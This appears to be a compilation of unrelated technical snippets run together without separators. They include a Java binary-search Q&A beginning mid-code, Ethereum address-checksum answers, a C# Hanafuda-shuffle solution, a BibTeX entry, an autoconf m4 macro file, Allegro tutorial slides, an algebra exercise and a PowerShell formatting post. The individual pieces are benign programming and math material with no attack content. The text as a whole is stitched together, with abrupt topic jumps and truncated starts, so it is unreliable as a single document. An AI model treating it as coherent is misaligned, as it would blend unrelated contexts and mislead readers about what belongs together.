public static boolean binarySearch(int[] a, int item) {
int start = 0, end = a.length - 1;
while (end >= start) {
int mid = start + ((end - start) / 2);
if (a[mid] == item)
return true;
if (a[mid] > item)
end = mid - 1;
else
start = mid + 1;
}
return false;
}
public static int randomitem ( int[] a ) {
int i;
Random random = new Random();
int item = random.nextInt( 10999 );
for( i = 0; i < 10000; i++ )
{
a[ i ] = random.nextInt( 10000 );
}
return item;
}
}
I want my program to produce output similar to the image from my linear search program.
Answer
Here is your code with some changes and refactoring:
public class TestResulter
{
public static void main(String[] args)
{
int numberOfItems = 10000;
int item;
int[] a = new int[numberOfItems];
fillArray(a);
for( int i = 0; i < 20; i++ )
{
item = Resulter.randomitem(a);
System.out.println(Resulter.binarySearch(a, item));
}
}
private static void fillArray(int[] a)
{
Random random = new Random();
for(int i = 0; i < a.length; i++)
a[i] = random.nextInt(10000);
Arrays.sort(a);
}
}
public class Resulter
{
private static class Result
{
public boolean found; // true if found, false if not found
public int index; // index where item was found, -1 if not found
public int steps; // number of comparisons performed
public Result(boolean f, int ind, int st)
{
found = f;
index = ind;
steps = st;
}
@Override
public String toString()
{
return "Result [found=" + found + ", index=" + index + ", steps=" + steps + "]";
}
}
public static Result binarySearch(int[] a, int item)
{
int start=0, end=a.length-1;
int stepCount = 0;
while(end>=start)
{
stepCount++;
int mid = start + ((end - start) / 2);
if(a[mid] == item)
return new Result(true, mid, stepCount);
else if(a[mid] > item)
end = mid-1;
else
start = mid+1;
}
return new Result(false, -1, stepCount);
}
public static int randomitem(int[] a)
{
return new Random().nextInt(10000);
}
}
As I see it, the main problems in your solution were:
1. The array was not sorted. Binary search only works on sorted arrays, therefore the Arrays.sort(a) command.
2. The binarySearch returned a boolean and not a Result object, which is what you wanted to print out.
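The first point is the usual failure mode: binary search is only valid on sorted input. The same algorithm as the Java above, sketched in Python with the sort step made explicit:

```python
def binary_search(a, item):
    lo, hi = 0, len(a) - 1
    while lo <= hi:
        mid = lo + (hi - lo) // 2
        if a[mid] == item:
            return True
        elif a[mid] < item:
            lo = mid + 1
        else:
            hi = mid - 1
    return False

# binary search presumes sorted data, hence the sorted() call
data = sorted([7, 3, 9, 1, 5])
```

Running binary_search on the raw, unsorted list would return False for values that are actually present, which is exactly the symptom described in the question.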
I've read many times that you should never input an address by hand unless you want to accidentally send Ether into no-man's-land. I'd like to know what those checksums are. Is there a way to tell a typo has occurred? How, and what are the formatting rules? I'm asking so I can potentially create a wrapper function that checks for these things before submitting to the network.
Regular Address
EIP 55 added a "capitals-based checksum" which was implemented by Geth by May 2016. Here's Javascript code from Geth:
/**
* Checks if the given string is an address
*
* @method isAddress
* @param {String} address the given HEX adress
* @return {Boolean}
*/
var isAddress = function (address) {
if (!/^(0x)?[0-9a-f]{40}$/i.test(address)) {
// check if it has the basic requirements of an address
return false;
} else if (/^(0x)?[0-9a-f]{40}$/.test(address) || /^(0x)?[0-9A-F]{40}$/.test(address)) {
// If it's all small caps or all all caps, return true
return true;
} else {
// Otherwise check each case
return isChecksumAddress(address);
}
};
/**
* Checks if the given string is a checksummed address
*
* @method isChecksumAddress
* @param {String} address the given HEX adress
* @return {Boolean}
*/
var isChecksumAddress = function (address) {
// Check each case
address = address.replace('0x','');
var addressHash = sha3(address.toLowerCase());
for (var i = 0; i < 40; i++ ) {
// the nth letter should be uppercase if the nth digit of casemap is 1
if ((parseInt(addressHash[i], 16) > 7 && address[i].toUpperCase() !== address[i]) || (parseInt(addressHash[i], 16) <= 7 && address[i].toLowerCase() !== address[i])) {
return false;
}
}
return true;
};
ICAP Address
ICAP has a checksum which can be verified. You can review Geth's icap.go and here's a snippet from it:
// https://en.wikipedia.org/wiki/International_Bank_Account_Number#Validating_the_IBAN
func validCheckSum(s string) error {
s = join(s[4:], s[:4])
expanded, err := iso13616Expand(s)
if err != nil {
return err
}
checkSumNum, _ := new(big.Int).SetString(expanded, 10)
if checkSumNum.Mod(checkSumNum, Big97).Cmp(Big1) != 0 {
return ICAPChecksumError
}
return nil
}
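The ISO 13616 / IBAN check that the Go snippet performs can be sketched in Python. The example value is the standard GB test IBAN (not an Ethereum ICAP address), used here just to exercise the mod-97 rule:

```python
def mod97_checksum_ok(s):
    """ISO 13616 check: rotate the first four chars to the end, expand letters
    A-Z to 10-35, and require the resulting integer to be == 1 (mod 97)."""
    rotated = s[4:] + s[:4]
    # int(c, 36) maps '0'-'9' to 0-9 and 'A'-'Z' to 10-35
    expanded = "".join(str(int(c, 36)) for c in rotated)
    return int(expanded) % 97 == 1
```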
• Great answer! Out of curiosity, any idea how good the checksum is? Meaning with a few wrong digits, what are the chances it passes the checksum coincidentally anyway? – ZMitton Feb 15 '16 at 11:07
• EIP 55 compares the regular address checksum with ICAP: "On average there will be 15 check bits per address, and the net probability that a randomly generated address if mistyped will accidentally pass a check is 0.0247%. This is a ~50x improvement over ICAP, but not as good as a 4-byte check code." – eth May 8 '16 at 6:29
• It would be nice to be able to check for validity in Solidity as well. One way to do this would be to transfer a tiny amount of ether to any new address you create, and check for non-zero balance in Solidity. (Should that be a separate question?) – Paul S Jul 6 '16 at 3:40
• @PedroLobito For sha3, you can use keccak256 from a library like github.com/emn178/js-sha3 I have not been able to find the recent code that Geth uses to improve this answer. – eth Oct 17 '17 at 8:02
• @Alper Yes a smart contract address can be capitalized according to EIP 55, example. – eth Apr 15 '18 at 7:01
There is an easier way now with web3:
Naive:
https://web3js.readthedocs.io/en/v1.2.0/web3-utils.html#isaddress
web3.utils.isAddress('0xc1912fee45d61c87cc5ea59dae31190fffff232d');
> true
OR
Better version
https://web3js.readthedocs.io/en/v1.2.0/web3-utils.html#tochecksumaddress
try {
const address = web3.utils.toChecksumAddress(rawInput)
} catch(e) {
console.error('invalid ethereum address', e.message)
}
Using the checksum method is better because you will always deal with normalized data and never have to lower-case it.
• The isAddress() method also checks the checksum! Why do we need to go with the checksum method? – atul Mar 31 at 2:44
The standard 40 character hex addresses now have a checksum in the form of capitalization. If the address has at least one capital letter then it is checksummed and, if inputted on a site that checks the sum, it will return false if it's not a valid address.
The scheme is as follows:
convert the address to hex, but if the ith digit is a letter (i.e. it's one of abcdef) print it in uppercase if the 4*ith bit of the hash of the address (in binary form) is 1, otherwise print it in lowercase
You can read VB's full write-up here: https://github.com/ethereum/EIPs/issues/55
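As a concrete illustration, the rule above can be sketched in Python. This is a minimal sketch, not a production implementation: the Keccak-256 hash is injected as a parameter, because Python's standard hashlib ships NIST SHA-3 (which pads differently from Keccak-256); in real use you would pass a digest function from a third-party library such as eth-hash or pysha3 (assumed dependencies).

```python
def to_checksum_address(address, keccak_hex):
    """EIP-55 sketch: uppercase the i-th hex digit iff it is a letter and
    the i-th hex digit of keccak256(lowercased address body) is >= 8,
    i.e. the 4*i-th bit of the hash is 1."""
    body = address.lower()
    if body.startswith("0x"):
        body = body[2:]
    digest = keccak_hex(body)  # hex digest of keccak256(body.encode())
    checked = "".join(
        c.upper() if c.isalpha() and int(h, 16) >= 8 else c
        for c, h in zip(body, digest)
    )
    return "0x" + checked

def is_checksum_valid(address, keccak_hex):
    # an address passes iff re-checksumming it reproduces it exactly
    return to_checksum_address(address, keccak_hex) == address
```

Validation then reduces to re-checksumming: a mixed-case address is valid exactly when to_checksum_address returns it unchanged.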
The python package 'ethereum' has a function called 'check_checksum' in the utils module:
from ethereum.utils import check_checksum
check_checksum('0xc1912fee45d61c87cc5ea59dae31190fffff232d')
> True
I built a small project for this which I use programmatically in my apps. It has a 'micro' API:
https://balidator.io/api/ethereum/0xea0258D0E745620e77B0A389e3A656EFdb7Cf821
It also has address validation for bitcoin, monero, and ripple.
You can find the documentation here: balidator.io/api-documentation
function validateInputAddresses(address) {
return (/^(0x){1}[0-9a-fA-F]{40}$/i.test(address));
}
• This just tests plausibility; it doesn't validate the checksum. It still seems to be a better way to write the plausibility-test regex. – Simeon Mar 21 '18 at 11:23
So far, plain Ether addresses have no checksum and are simply the hex encoding of the address bytes. There is, however, a proposal for encoding and checksumming; see ICAP: Inter exchange Client Address Protocol.
ICAP has preliminary support merged in some Ethereum clients.
Checksums are mechanisms to prevent sending funds to wrong addresses (set by mistake or by a malicious party).
Programmatically
You can use web3's amazing utils:
web3.utils.toChecksumAddress(value)
The function above works only if you have version 1.0.0 or above.
Web
I created an online tool, check it out here: EthSum.
Another way to check is available if you also have the public key for the Ethereum address. The Ethereum Foundation's official eth-keys Python library can be used; it is now part of their GitHub repo and contains a suite of tools that includes ways to check address validity, such as the PublicKey(...).to_checksum_address() method (see the example below).
The following method requires the uncompressed public key in bytes format, which means it would have to be only for accounts you have the public-key data for:
>>> from eth_keys import keys
>>> keys.PublicKey(b'\x98\xbb\xfa\xdd\xbc\xc7\xab\x14\xa3\x9c\xb4\x84\xbf\x94MO\xf5\x91^G\xc1\xc2\x0b\xe77t\xc3\xd0\x05\x12|Z\xf5\x17PZ\x97\xe2\\`IR\xc1\xbd\x10\xa3\xa3\xdf\xbf0\xaf;7\xc0z\xbc\xc7\x0b\x9c\xbd<FY\x98').to_checksum_address()
'0x28f4961F8b06F7361A1efD5E700DE717b1db5292'
Hanafuda Shuffle
Updated: 2019-09-30
There are several ways to shuffle a deck of cards. One of them is the shuffle used in the Japanese card game "Hanafuda". Below is how to perform it.
There is a deck of n cards. Starting from the p-th card from the top, c cards are taken out and placed on top of the deck. We will call this operation a cut.
Write a program that simulates the Hanafuda shuffle and prints the number of the card that ends up on top.
Input
The input consists of several test cases. Each test case begins with a line containing two positive integers n (1 ≤ n ≤ 50) and r (1 ≤ r ≤ 50): the number of cards in the deck and the number of cut operations.
Each of the next r lines describes a cut operation; the cuts are performed in the listed order. Each line contains two positive integers p and c (p + c ≤ n + 1). Starting from the p-th card from the top, c cards are pulled out and placed on top.
The last line contains two zeros.
Output
For each test case, print on a separate line the number of the top card after the shuffle. Assume the cards are initially numbered from 1 to n, bottom to top.
Solution outline
• Keep processing until two zeros are read;
• Read n and r;
• Fill a list with the initial deck;
• Perform the Hanafuda shuffle using LINQ.
Solution
using System;
using System.Collections.Generic;
using System.Linq;
class Program
{
static void Main(string[] args)
{
while (true)
{
var prts = Array.ConvertAll(Console.ReadLine().Split(new[] { ' ' }, StringSplitOptions.RemoveEmptyEntries),
s => int.Parse(s));
var n = prts[0];
var r = prts[1];
if (n == 0 && r == 0)
return;
var list = new List<int>();
for (var i = n; i >= 1; i--)
{
list.Add(i);
}
for (var i = 0; i < r; i++)
{
prts = Array.ConvertAll(Console.ReadLine().Split(new[] { ' ' }, StringSplitOptions.RemoveEmptyEntries),
s => int.Parse(s));
var p = prts[0] - 1;
var c = prts[1];
var tmpList = new List<int>();
tmpList.AddRange(list.Skip(p).Take(c));
tmpList.AddRange(list.Take(p));
tmpList.AddRange(list.Skip(p + c));
list = tmpList;
}
Console.WriteLine(list[0]);
}
}
}
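For comparison, the same cut operation can be sketched in Python with list slicing; this is an illustrative equivalent of the LINQ solution above, not part of the original program.

```python
def hanafuda_top(n, cuts):
    # index 0 is the top of the deck; cards are numbered 1..n bottom-to-top,
    # so the initial deck from the top down is n, n-1, ..., 1
    deck = list(range(n, 0, -1))
    for p, c in cuts:
        taken = deck[p - 1:p - 1 + c]              # c cards starting at the p-th from the top
        deck = taken + deck[:p - 1] + deck[p - 1 + c:]
    return deck[0]
```

For example, a 5-card deck with the two cuts (3, 1) and (3, 1) ends with card 4 on top: hanafuda_top(5, [(3, 1), (3, 1)]) returns 4.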
%% You should probably cite rfc6828 instead of this I-D.
@techreport{ietf-avtext-splicing-for-rtp-07,
  number      = {draft-ietf-avtext-splicing-for-rtp-07},
  type        = {Internet-Draft},
  institution = {Internet Engineering Task Force},
  publisher   = {Internet Engineering Task Force},
  note        = {Work in Progress},
  url         = {https://datatracker.ietf.org/doc/draft-ietf-avtext-splicing-for-rtp/07/},
  author      = {Jinwei Xia},
  title       = {{Content Splicing for RTP Sessions}},
  pagetotal   = 16,
  year        = {},
  month       = {},
  day         = {},
  abstract    = {This memo outlines RTP splicing. Splicing is a process that replaces the content of the main multimedia stream with other multimedia content, and delivers the substitutive multimedia content to receiver for a period of time. This memo provides some RTP splicing use cases, then we enumerate a set of requirements and analyze whether an existing RTP level middlebox can meet these requirements, at last we provide concrete guidelines for how the chosen middlebox works to handle RTP splicing.},
}
APKinspector / androguard / classification / libsimilarity / sources / xz-5.0.2 / m4 / lib-prefix.m4
# lib-prefix.m4 serial 5 (gettext-0.15)
dnl Copyright (C) 2001-2005 Free Software Foundation, Inc.
dnl This file is free software; the Free Software Foundation
dnl gives unlimited permission to copy and/or distribute it,
dnl with or without modifications, as long as this notice is preserved.
dnl From Bruno Haible.
dnl AC_LIB_ARG_WITH is synonymous to AC_ARG_WITH in autoconf-2.13, and
dnl similar to AC_ARG_WITH in autoconf 2.52...2.57 except that it doesn't
dnl require excessive bracketing.
ifdef([AC_HELP_STRING],
[AC_DEFUN([AC_LIB_ARG_WITH], [AC_ARG_WITH([$1],[[$2]],[$3],[$4])])],
[AC_DEFUN([AC_][LIB_ARG_WITH], [AC_ARG_WITH([$1],[$2],[$3],[$4])])])
dnl AC_LIB_PREFIX adds to the CPPFLAGS and LDFLAGS the flags that are needed
dnl to access previously installed libraries. The basic assumption is that
dnl a user will want packages to use other packages he previously installed
dnl with the same --prefix option.
dnl This macro is not needed if only AC_LIB_LINKFLAGS is used to locate
dnl libraries, but is otherwise very convenient.
AC_DEFUN([AC_LIB_PREFIX],
[
AC_BEFORE([$0], [AC_LIB_LINKFLAGS])
AC_REQUIRE([AC_PROG_CC])
AC_REQUIRE([AC_CANONICAL_HOST])
AC_REQUIRE([AC_LIB_PREPARE_MULTILIB])
AC_REQUIRE([AC_LIB_PREPARE_PREFIX])
dnl By default, look in $includedir and $libdir.
use_additional=yes
AC_LIB_WITH_FINAL_PREFIX([
eval additional_includedir=\"$includedir\"
eval additional_libdir=\"$libdir\"
])
AC_LIB_ARG_WITH([lib-prefix],
[ --with-lib-prefix[=DIR] search for libraries in DIR/include and DIR/lib
--without-lib-prefix don't search for libraries in includedir and libdir],
[
if test "X$withval" = "Xno"; then
use_additional=no
else
if test "X$withval" = "X"; then
AC_LIB_WITH_FINAL_PREFIX([
eval additional_includedir=\"$includedir\"
eval additional_libdir=\"$libdir\"
])
else
additional_includedir="$withval/include"
additional_libdir="$withval/$acl_libdirstem"
fi
fi
])
if test $use_additional = yes; then
dnl Potentially add $additional_includedir to $CPPFLAGS.
dnl But don't add it
dnl 1. if it's the standard /usr/include,
dnl 2. if it's already present in $CPPFLAGS,
dnl 3. if it's /usr/local/include and we are using GCC on Linux,
dnl 4. if it doesn't exist as a directory.
if test "X$additional_includedir" != "X/usr/include"; then
haveit=
for x in $CPPFLAGS; do
AC_LIB_WITH_FINAL_PREFIX([eval x=\"$x\"])
if test "X$x" = "X-I$additional_includedir"; then
haveit=yes
break
fi
done
if test -z "$haveit"; then
if test "X$additional_includedir" = "X/usr/local/include"; then
if test -n "$GCC"; then
case $host_os in
linux* | gnu* | k*bsd*-gnu) haveit=yes;;
esac
fi
fi
if test -z "$haveit"; then
if test -d "$additional_includedir"; then
dnl Really add $additional_includedir to $CPPFLAGS.
CPPFLAGS="${CPPFLAGS}${CPPFLAGS:+ }-I$additional_includedir"
fi
fi
fi
fi
dnl Potentially add $additional_libdir to $LDFLAGS.
dnl But don't add it
dnl 1. if it's the standard /usr/lib,
dnl 2. if it's already present in $LDFLAGS,
dnl 3. if it's /usr/local/lib and we are using GCC on Linux,
dnl 4. if it doesn't exist as a directory.
if test "X$additional_libdir" != "X/usr/$acl_libdirstem"; then
haveit=
for x in $LDFLAGS; do
AC_LIB_WITH_FINAL_PREFIX([eval x=\"$x\"])
if test "X$x" = "X-L$additional_libdir"; then
haveit=yes
break
fi
done
if test -z "$haveit"; then
if test "X$additional_libdir" = "X/usr/local/$acl_libdirstem"; then
if test -n "$GCC"; then
case $host_os in
linux*) haveit=yes;;
esac
fi
fi
if test -z "$haveit"; then
if test -d "$additional_libdir"; then
dnl Really add $additional_libdir to $LDFLAGS.
LDFLAGS="${LDFLAGS}${LDFLAGS:+ }-L$additional_libdir"
fi
fi
fi
fi
fi
])
dnl AC_LIB_PREPARE_PREFIX creates variables acl_final_prefix,
dnl acl_final_exec_prefix, containing the values to which $prefix and
dnl $exec_prefix will expand at the end of the configure script.
AC_DEFUN([AC_LIB_PREPARE_PREFIX],
[
dnl Unfortunately, prefix and exec_prefix get only finally determined
dnl at the end of configure.
if test "X$prefix" = "XNONE"; then
acl_final_prefix="$ac_default_prefix"
else
acl_final_prefix="$prefix"
fi
if test "X$exec_prefix" = "XNONE"; then
acl_final_exec_prefix='${prefix}'
else
acl_final_exec_prefix="$exec_prefix"
fi
acl_save_prefix="$prefix"
prefix="$acl_final_prefix"
eval acl_final_exec_prefix=\"$acl_final_exec_prefix\"
prefix="$acl_save_prefix"
])
dnl AC_LIB_WITH_FINAL_PREFIX([statement]) evaluates statement, with the
dnl variables prefix and exec_prefix bound to the values they will have
dnl at the end of the configure script.
AC_DEFUN([AC_LIB_WITH_FINAL_PREFIX],
[
acl_save_prefix="$prefix"
prefix="$acl_final_prefix"
acl_save_exec_prefix="$exec_prefix"
exec_prefix="$acl_final_exec_prefix"
$1
exec_prefix="$acl_save_exec_prefix"
prefix="$acl_save_prefix"
])
dnl AC_LIB_PREPARE_MULTILIB creates a variable acl_libdirstem, containing
dnl the basename of the libdir, either "lib" or "lib64".
AC_DEFUN([AC_LIB_PREPARE_MULTILIB],
[
dnl There is no formal standard regarding lib and lib64. The current
dnl practice is that on a system supporting 32-bit and 64-bit instruction
dnl sets or ABIs, 64-bit libraries go under $prefix/lib64 and 32-bit
dnl libraries go under $prefix/lib. We determine the compiler's default
dnl mode by looking at the compiler's library search path. If at least one
dnl of its elements ends in /lib64 or points to a directory whose absolute
dnl pathname ends in /lib64, we assume a 64-bit ABI. Otherwise we use the
dnl default, namely "lib".
acl_libdirstem=lib
searchpath=`(LC_ALL=C $CC -print-search-dirs) 2>/dev/null | sed -n -e 's,^libraries: ,,p' | sed -e 's,^=,,'`
if test -n "$searchpath"; then
acl_save_IFS="${IFS= }"; IFS=":"
for searchdir in $searchpath; do
if test -d "$searchdir"; then
case "$searchdir" in
*/lib64/ | */lib64 ) acl_libdirstem=lib64 ;;
*) searchdir=`cd "$searchdir" && pwd`
case "$searchdir" in
*/lib64 ) acl_libdirstem=lib64 ;;
esac ;;
esac
fi
done
IFS="$acl_save_IFS"
fi
])
The Allegro Library - Introduction to Computing tutoring (if669ec), Thais Alves de Souza Melo (tasm), 2011.2
1 The Allegro Library - Introduction to Computing tutoring (if669ec) - Thais Alves de Souza Melo (tasm)
2 Installation The Code::Blocks package from the course website already comes with Allegro installed. Guide for manual installation: Easy installation:
3 Creating the Project
4 Hello World
5 Init( ) int allegro_init(); Initializes Allegro and must be called before any other function in the library. int install_timer(); int install_keyboard(); int install_mouse(); These install the timer, the keyboard, and the mouse, respectively. int install_sound(int digi_card, int midi_card, char *cfg_path); Not included in init() by default; it enables sound in Allegro. digi_card and midi_card refer to the digital and MIDI sound drivers, respectively; pass them as DIGI_AUTODETECT and MIDI_AUTODETECT so that Allegro selects the driver itself. The cfg_path parameter exists for compatibility with older versions and can be ignored by passing NULL.
6 Init( ) void set_color_depth(int depth); Sets the number of bits used by the graphics (depth). Possible values are: 8 (256 colors), 15 (32,768 colors), 16 (65,536 colors), 24 (approximately 16 million colors), 32 (approximately 4 billion colors). int set_gfx_mode(int card, int w, int h, int v_w, int v_h); Initializes the graphics mode. card is the graphics driver to use (e.g. GFX_AUTODETECT, so that Allegro detects the video card automatically); w and h are the horizontal and vertical screen size in pixels. v_w and v_h give the resolution of an optional virtual screen.
7 Deinit( ) void allegro_exit(); Used at the end of the program to shut Allegro down. It does not strictly need to be called, because allegro_init arranges for it to be called automatically when the program terminates.
8 Some Defined Types BITMAP A type defined by Allegro for convenient bitmap handling; a bitmap is a matrix of pixels in which each element holds a color. Declaration: BITMAP *name; Allegro automatically defines a BITMAP named screen that refers to the display. PALETTE An array of 256 positions, each representing a color code. Declaration: PALETTE name;
9 Some Defined Types FONT Holds the description of the fonts that can be drawn on screen. Declaration: FONT *name; MIDI Declaration: MIDI *name; SAMPLE Declaration: SAMPLE *name; The FONT and PALETTE types will not be used here.
10 Keyboard Allegro works with a key[] array of 127 positions whose elements represent the keys. To make lookups easier, constants are defined for indexing the array. Example: key[KEY_ESC]
Key -> array constant:
A, B... Z -> KEY_A, KEY_B... KEY_Z
Numeric keypad 0 to 9 -> KEY_0_PAD... KEY_9_PAD
Main keyboard 0 to 9 -> KEY_0... KEY_9
Esc -> KEY_ESC
Enter -> KEY_ENTER
Right arrow -> KEY_RIGHT
Left arrow -> KEY_LEFT
Up arrow -> KEY_UP
Down arrow -> KEY_DOWN
Pause -> KEY_PAUSE
Space bar -> KEY_SPACE
Print Screen -> KEY_PRTSCR
Left Shift -> KEY_LSHIFT
Right Shift -> KEY_RSHIFT
Left Control -> KEY_LCONTROL
Right Control -> KEY_RCONTROL
Left Alt -> KEY_ALT
Right Alt -> KEY_ALTGR
11 Examples
while(!key[KEY_ESC]) {... } // executes the code while ESC is not pressed
if(key[KEY_ENTER]) {... } // enters the if only while ENTER is pressed
12 Text void textout_ex(BITMAP *bmp, const FONT *f, const char *s, int x, int y, int color, int bg); Prints a string on the screen at position x, y. color is the text color and bg the background color of the text. void textprintf_ex(BITMAP *bmp, const FONT *f, int x, int y, int color, int bg, const char *fmt,...); Prints a string in a way similar to printf(), allowing format specifiers such as %d, %c, etc. int makecol(int r, int g, int b); Converts colors from RGB format into the format accepted by the functions. Note 1: 0 is black, and -1 or makecol(255, 0, 255) is transparent. Note 2: Pass the FONT parameter as font (no quotes) to use the system's own font. Note 3: Both functions have variants that print the text centered, justified, or right-aligned.
13 Image Primitives int getpixel(BITMAP *bmp, int x, int y); Reads the pixel at coordinate (x, y) of a BITMAP. int getr(int c); int getg(int c); int getb(int c); Return, respectively, the R, G, and B values of a given pixel (obtained with getpixel()). void putpixel(BITMAP *bmp, int x, int y, int color); void line(BITMAP *bmp, int x1, int y1, int x2, int y2, int color); void triangle(BITMAP *bmp, int x1, y1, x2, y2, x3, y3, int color); void rect(BITMAP *bmp, int x1, int y1, int x2, int y2, int color); void circle(BITMAP *bmp, int x, int y, int radius, int color);
14 Loading Images BITMAP *create_bitmap(int width, int height); Creates a memory bitmap of the given size. BITMAP *load_bitmap(const char *filename, RGB *pal); Loads a bitmap file from disk. RGB *pal refers to the color palette, applied only to 8-bit images; pass NULL. void destroy_bitmap(BITMAP *bitmap); Frees the memory used by a bitmap. void clear_bitmap(BITMAP *bitmap); Clears a bitmap to black. void clear_to_color(BITMAP *bitmap, int color); Analogous to the above, but lets you choose the color the bitmap is cleared to. Note: it is not necessary to call create_bitmap before load_bitmap!
15 Blitting and Sprites void blit(BITMAP *source, BITMAP *dest, int source_x, int source_y, int dest_x, int dest_y, int width, int height); Copies a rectangular area (width x height) of the source bitmap into the destination bitmap (dest). Does not treat pure pink as transparent. void draw_sprite(BITMAP *bmp, BITMAP *sprite, int x, int y); Copies the source bitmap (sprite) directly onto the destination bitmap (bmp). Treats pure pink as transparent. Note: both functions have variants that mirror, scale, or rotate images.
16 Example
...
BITMAP *buffer, *imagem;
buffer = create_bitmap(60, 60);
imagem = load_bitmap("imagem.bmp", NULL);
...
blit(imagem, buffer, 100, 100, 0, 0, 60, 60);
draw_sprite(screen, buffer, 400, 300);
...
destroy_bitmap(imagem);
destroy_bitmap(buffer);
...
Note: we could call clear_bitmap() here instead, if we still needed the BITMAPs.
17 Double Buffering Drawing the bitmaps directly onto screen and then clearing it makes the display flicker at every frame change, producing a visually uncomfortable effect. To avoid this problem, the double-buffering technique is used: create a memory BITMAP* buffer, generally the size of the screen, and draw all the desired elements onto it. The buffer is then drawn to the screen and cleared, and so on for the following frames. Do not call clear_bitmap on the screen!
18 Examples
Without double buffering:
int main(){ init(); while (!key[KEY_ESC]){ textout_centre_ex(screen, font, "Without Double Buffering", 320, 240, makecol(255, 255, 255), 0); clear_bitmap(screen) ; } deinit(); return 0; } END_OF_MAIN()
With double buffering:
int main(){ init(); BITMAP* buffer = create_bitmap(640, 480) ; while (!key[KEY_ESC]){ textout_centre_ex(buffer, font, "With Double Buffering", 320, 240, makecol(255, 255, 255), 0); draw_sprite(screen, buffer, 0, 0) ; clear_bitmap(buffer) ; } deinit(); return 0; } END_OF_MAIN()
19 Sound: MIDI MIDI *load_midi(const char *filename); Loads a MIDI file. void destroy_midi(MIDI *midi); Frees the memory of the loaded file. int play_midi(MIDI *midi, int loop); Plays the given MIDI file, stopping the playback of any other MIDI. If loop receives any value other than 0, it plays until stopped or replaced. void stop_midi(); Stops whatever MIDI is playing (it works much like play_midi(NULL, false);).
20 Sound: SAMPLE SAMPLE *load_sample(const char *filename); Loads a SAMPLE. void destroy_sample(SAMPLE *spl); Frees the memory occupied by a SAMPLE. int play_sample(const SAMPLE *spl, int vol, int pan, int freq, int loop); Plays a sample. vol and pan range from 0 (min/left) to 255 (max/right). freq indicates the speed at which the sound plays, 1000 being normal speed. loop indicates whether the sound should repeat until stopped. void stop_sample(const SAMPLE *spl); Stops the playback of a sample. Note: unlike MIDIs, several SAMPLEs can be played at the same time.
21 Mouse The mouse in Allegro behaves like an object, with variables mouse_x and mouse_y that give its position. The variable mouse_b indicates which mouse button is pressed: bit 0 is the left button, bit 1 the right button, and bit 2 the middle button. Comparison syntax (note: this is a bitwise test, a single &): if(mouse_b & 1) printf("Left button pressed"); if(!(mouse_b & 1)) printf("Left button not pressed"); void position_mouse(int x, int y); Places the mouse at the given x, y position. void show_mouse(BITMAP *bmp); Draws the mouse on the given bitmap. To hide the mouse, pass NULL as the argument. Note: this only works with the timer installed.
22 Timer For controlling the game speed we first have the function void rest(unsigned int time); which makes the computer wait time milliseconds before executing the next command. On slower computers, however, this can hurt the pacing of the game, since commands would run more slowly, which would call for a smaller rest or even none at all to keep the speed constant. Using timers solves this problem.
23 Timer Example
volatile long int contador = 0; // global variable!
void timer_game();
...
void timer_game() { contador++; } END_OF_FUNCTION(timer_game);
...
int main() {
...
LOCK_VARIABLE(contador);
LOCK_FUNCTION(timer_game);
install_int(timer_game, TBF); // TBF = Time Between Frames
...
}
24 Exercise Implement a simplified Space Invaders in Allegro. It must have a menu with two options: Selecting the first shows a ship that moves horizontally under the user's control. When SPACE is pressed, the ship must fire a projectile (constant speed) in the direction it is facing. Pressing the P key must return to the initial menu. The second option exits the program.
25 References - Manual with the functions of Allegro versions 4 and 5.
26 Tutorials (in English): gro.html
College Algebra 7th Edition
Published by Brooks Cole
ISBN 10: 1305115546
ISBN 13: 978-1-30511-554-5
Chapter 2, Functions - Section 2.8 - One-to-One Functions and their Inverses - 2.8 Exercises - Page 263: 56
Answer
$f^{-1}(x) = \frac{2x}{x - 3}$
Work Step by Step
$f(x) = \frac{3x}{x - 2}$
$y = \frac{3x}{x - 2}$
$y(x - 2) = 3x$
$yx - 2y = 3x$
$yx - 3x = 2y$
$x(y - 3) = 2y$
$x = \frac{2y}{y - 3}$
Interchanging $x$ and $y$ gives the inverse: $f^{-1}(x) = \frac{2x}{x - 3}$
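As a quick numeric sanity check (not part of the textbook solution), composing the two functions should return the input wherever both are defined:

```python
def f(x):
    return 3 * x / (x - 2)      # original function, undefined at x = 2

def f_inv(x):
    return 2 * x / (x - 3)      # claimed inverse, undefined at x = 3

# spot-check the inverse relationship on a few points (avoiding x = 2 and x = 3)
for x in [5.0, 7.0, -1.0, 0.5]:
    assert abs(f(f_inv(x)) - x) < 1e-9
    assert abs(f_inv(f(x)) - x) < 1e-9
```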
Use PowerShell to Group and Format Output
Summary: Microsoft Scripting Guy, Ed Wilson, teaches how to use Windows PowerShell to group and to format output.
Microsoft Scripting Guy, Ed Wilson, is here. One of the cool things about Windows PowerShell is that it allows you to work the way that you like to do so. The other day, I was making a presentation to the Charlotte PowerShell Users Group. The photo that follows shows me talking, and the Scripting Wife and Microsoft PFE Jason Walker at this first ever meeting.
Photo
One of the attendees asked, “Is Windows PowerShell a developer technology or a network administrator type of technology?” Before I could even answer the question, someone else jumped in and said that Windows PowerShell is really powerful, and that it has a number of things that would appeal to developers. However, he continued, the main thing about Windows PowerShell is that it allows you to process large amounts of data very quickly. Cool, I thought to myself; I did not see the need to add anything else to the conversation.
One of the fundamental aspects of working with data is grouping the data to enable viewing relationships in a more meaningful way. Earlier this week, I looked at using the Group-Object cmdlet to group information.
The Group-Object cmdlet does a good job of grouping Windows PowerShell objects for display, but there are times when a simple grouping might be useful in a table. The problem is that the syntax is not exactly intuitive. For example, it would seem that the command that is shown here would work.
Get-Service | Format-Table name, status -GroupBy status
When the command runs, however, the output (shown in the following image) appears somewhat jumbled.
Image of command output
In fact, the first time I ran across this, the output confused me because it looks like it is grouping the output. The second time I ran across this grouping behavior, the output seriously disappointed me because I realized that it was not really grouping the output. Then it dawned on me, I need to sort the output prior to sending it to the Format-Table command. I therefore, modified the command to incorporate the Sort-Object cmdlet. The revised command is shown here.
Get-Service | Sort-Object status | Format-Table name, status -GroupBy status
After it is sorted by the Status property, the service information displays correctly in the grouped table. This revised output is shown in the image that follows.
Image of command output
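The sort-before-grouping requirement is not unique to these cmdlets. Python's itertools.groupby, for instance, behaves the same way: it only merges consecutive items, so unsorted input produces fragmented groups.

```python
from itertools import groupby

# a small, made-up stand-in for Get-Service output: (name, status) pairs
services = [("Spooler", "Running"), ("BITS", "Stopped"),
            ("WinRM", "Running"), ("Themes", "Stopped")]
status = lambda svc: svc[1]

# Unsorted input: groupby only merges *consecutive* items, so we get four groups.
fragmented = [key for key, _ in groupby(services, key=status)]

# Sorting by status first yields the two expected groups.
grouped = [key for key, _ in groupby(sorted(services, key=status), key=status)]
```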
